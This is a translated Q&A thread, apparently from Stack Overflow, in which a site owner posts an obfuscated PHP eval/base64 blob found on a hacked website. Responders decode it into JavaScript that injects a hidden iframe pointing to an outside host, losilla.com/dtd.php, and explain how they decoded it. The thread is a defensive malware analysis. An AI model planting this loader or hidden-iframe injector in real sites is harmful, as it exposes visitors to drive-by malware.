我的网站被黑了，但我不知道这是什么意思

我的网站被黑了。我想知道这个代码是什么意思？我的网站被黑了，但我不知道这是什么意思

<? 
#0242d5 
#eval(gzinflate(base64_decode("5VVNc5swEL33V1gcOjBOMV8WtITUMzn13GPpQQaB6TiGImI39vi/d3cFcXGTZsbNLR4GS6t9b9+utEJmq3piTN7s71plbdV0k+6hkUlqdPJXN/shtkKbU2OyFpvyXpS4OLLfvN2aNUkjWiW/bLpYqcR0Pd/6/LVrq01pF219d7sS7W2dy09OLFT5EwrnRYxzFs4Zl4z7LAwYXzBe4NRzGKx6CxyES5YzQabhCTnjLgs9HAMghDeN/ZwsAbH4RJ0zTgGA3dNhPLK4FG/OAhhnZPnTE2KHpIaTv9uvghE0+VrQuaiTEODQcfyTKOSLkBsfMAK2wAeDF+iP0TJ63F4pJpGTD6E4ZYAhInwDob98UQQgF32CPXgIdlbuk0oX4aEOn2ENdaEuiQd2dPBoS+b9hj1G8i9LAtLHjQLLUNIRqYvYMLqsPnrTdbmj1+PtTxh/XbFB7/AC41+sdKz7DnP/2S0h7VrwdJMEHsoJqF59wzzqpT55tn1Hap4PD7uBR2cxHECdVEaQBd4BfTIBpj/PRgr01JforztIQ8AyauILZP1vVSRdPg4Z9d0HKJ+Otd5dAp5QT2oNczLBH1JG2is17FY2a5FJc7aYlVep8TE1LFs166ozU4PBJO7ah0NeZ/d3ctPZyzp/eJ84tnvMRJetzDJXpcpL67DfJ36cL9WqlUnoxFVh6ol12BbbnUycEU/cwwXiBxc3PgKM0cQ6yERuxTo+Krj3UwMJ93urqFuzAq7qQwBJ42A6tQ6wtqs2eb2zB35LTROlzMbED8e36vuVyy2L6M8dpalg4Xg90x/km3dG/Bs="))); 
#/0242d5# 
?>

在此先感谢。

来源

2013-04-06 user1801605

Joomla/WordPress的网站？我也拥有它 – 2013-04-06 00:05:51

这可能是他们如何跟踪他们发送用户的恶意软件链接。我见过类似的黑客攻击。这一个是类似的：http://blog.unmaskparasites.com/2012/03/07/you-need-to-pay-for-this-crypt-trial-version-of-malware – Tony 2013-04-06 00:09:58

在我的网站（wordpress/joomla ）我只需要使用最新版本更新它们。 – 2013-04-06 00:11:03

这里是解码内容：

<script type="text/javascript" language="javascript"> 
p = parseInt; 
ss = (123) ? String.fromCharCode : 0; 
asgq = "[email protected][email protected]!20!7b!d!a!20!20!20!20!76!61!72!20!6f!70!62!20!3d!20!64!6f!63!7[email protected][email protected]!3b!d!a!d!a!20!20!20!20!6[email protected]!6c!6c!61!2e!63!6f!6d!2f[email protected][email protected][email protected]!6f!6e!20!3d!20!27!61[email protected]!6c!65!2e!62!6f!72!64[email protected][email protected]!67!68!74[email protected][email protected]!64!74!68[email protected]!6c!65!2e!6c!65!66!74[email protected]!6c![email protected]!66!20!28!2[email protected][email protected][email protected][email protected]!20!7b[email protected][email protected][email protected][email protected][email protected]!3b!d!a!20!20!20!20!20!20!20!2[email protected][email protected]!64!28!2[email protected][email protected][email protected][email protected][email protected]!3b".replace(/@/g, "9").split("!"); 
try { 
    document.body &= 0.1 
} catch (gdsgsdg) { 
    zz = 3; 
    dbshre = 70; 
    if (dbshre) { 
     vfvwe = 0; 
     try { 
      document; 
     } catch (agdsg) { 
      vfvwe = 1; 
     } 
     if (!vfvwe) { 
      e = eval; 
     } 
     s = ""; 
     if (zz) for (i = 0; i - 464 != 0; i++) { 
       if (window.document) s += ss(p(asgq[i], 16)); 
     } 
     if (window.document) e(s); 
    } 
} 
</script>

的，这个解码内容（不良手混淆）脚本：

(function() { 
    var opb = document.createElement('iframe'); 

    opb.src = 'http://losilla.com/dtd.php'; 
    opb.style.position = 'absolute'; 
    opb.style.border = '0'; 
    opb.style.height = '1px'; 
    opb.style.width = '1px'; 
    opb.style.left = '1px'; 
    opb.style.top = '1px'; 

    if (!document.getElementById('opb')) { 
     document.write('<div id=\'opb\'></div>'); 
     document.getElementById('opb').appendChild(opb); 
    } 
})();

它看起来坪回http://losilla.com/dtd.php以确认网站遭到了破坏。可能还有一个后门脚本也在公共文件夹中。

来源

2013-04-06 00:15:27 Blender

非常感谢。我可以知道你是如何解码的？ – user1801605 2013-04-06 00:30:02

@ user1801605：我刚刚从PHP代码中取出了'eval'，并用'echo'替换了它。打印出编码后的JavaScript，我只是手工清理并做了相同的事情。 – Blender 2013-04-06 00:32:05

您也可以到[jsfiddle]（http://jsfiddle.com）并用'document.getElementsByTagName（“body”）[0] .innerHTML = s;'替换'e（s）;'并运行它。 – dragonfire 2015-06-16 17:52:01

我的网站被黑了，但我不知道这是什么意思

回答

相关问题